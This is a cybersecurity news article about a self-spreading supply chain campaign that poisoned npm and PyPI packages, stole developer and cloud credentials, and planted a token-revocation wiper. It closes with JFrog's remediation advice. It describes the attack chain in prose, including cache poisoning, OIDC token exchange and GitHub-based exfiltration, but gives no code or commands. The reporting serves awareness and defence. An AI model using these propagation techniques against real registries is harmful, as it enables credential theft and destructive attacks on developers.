Hackers Compromise 170 npm Packages to Steal GitHub

Software developers globally are facing a significant threat following a sprawling supply chain attack. Attackers compromised over 170 npm packages and two PyPI packages in a coordinated campaign designed for credential theft.

The infected packages are collectively downloaded over 200 million times per week, making the potential blast radius enormous.

The threat group behind the campaign, tracked as TeamPCP, injected malicious loaders and obfuscated JavaScript payloads into widely used developer packages.

These payloads were built to run silently inside developer machines and CI/CD pipelines, harvest sensitive credentials, and use those credentials to spread even further. The scale of exposure caught many development teams off guard.

Researchers at JFrog uncovered the full scope of this campaign, naming it “Shai-Hulud: Here We Go Again” after recognizing hallmarks from previous attacks by the same group.

Their analysis revealed that this was not a simple one-time intrusion but a self-replicating operation designed to keep growing with every successful new infection.

Hackers Compromise 170 npm Packages

The attack began inside a trusted GitHub release environment. The attackers exploited a workflow pattern that allowed fork-controlled code to run in a privileged repository context, gaining a foothold without raising immediate red flags.

From there, they poisoned a build cache entry, which a later release workflow restored during what looked like routine build activity.

Once inside, the malware extracted GitHub Actions identity tokens from runner memory and exchanged them for npm publishing credentials.

It then injected malicious code into additional packages, bumped their version numbers, and republished them. Each compromised package became a launchpad for the next wave of infections.

What makes this campaign especially alarming is its worm-like behavior. Instead of stealing secrets from one machine and stopping, the malware keeps moving.

After collecting npm tokens or trusted-publishing credentials, the payload scans for every package the victim account can publish, rewrites those packages with malicious code, and pushes new infected versions to the public registry.

The malware can also request an OIDC token for the npm registry and exchange it for a publishing token, all while hiding behind the same trusted workflow identity that real developers use.

This means infected packages can appear to come from verified, trusted sources while still carrying malware inside.

The campaign also expanded into Python through two compromised PyPI packages. The PyPI variant uses an import-time trigger, so just importing the package in any Python script can activate the loader.

That loader then silently downloads a remote payload from attacker servers, which has since evolved into a full credential stealer targeting cloud providers, Kubernetes, Vault, password managers, and developer tools.

Credential Theft and the Dead-Man Switch

The npm payload targets a wide range of secrets, including GitHub tokens, npm credentials, AWS access keys from environment variables and cloud metadata services, Kubernetes service account tokens, HashiCorp Vault tokens, SSH keys, Docker credentials, and generic API keys.

In cloud environments, it queries the EC2 metadata service to retrieve IAM role credentials directly. The malware uses GitHub itself as an exfiltration channel.

It creates a public repository under a stolen token, commits encrypted credential bundles there, and marks the repository with the campaign name as a tracker.

Commits containing stolen GitHub tokens carry a threatening message warning defenders against revoking access. That threat is backed by a real dead-man switch.

The malware installs a background monitor that polls GitHub every 60 seconds and, if the stolen token is revoked, immediately triggers a destructive wipe command on the affected machine.

Defenders must fully remove all persistence before rotating any credentials, or they risk triggering the wiper themselves.

JFrog recommends isolating all affected machines and CI/CD runners before revoking any tokens. Persistence files and background services must be removed first.

After cleanup, teams should rotate GitHub tokens, npm tokens, AWS credentials, Kubernetes service accounts, Vault tokens, and SSH keys.

Developers should also review repositories for commits authored as “[email protected]” and look for unexpected Dependabot-like branches that do not match normal automation patterns.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.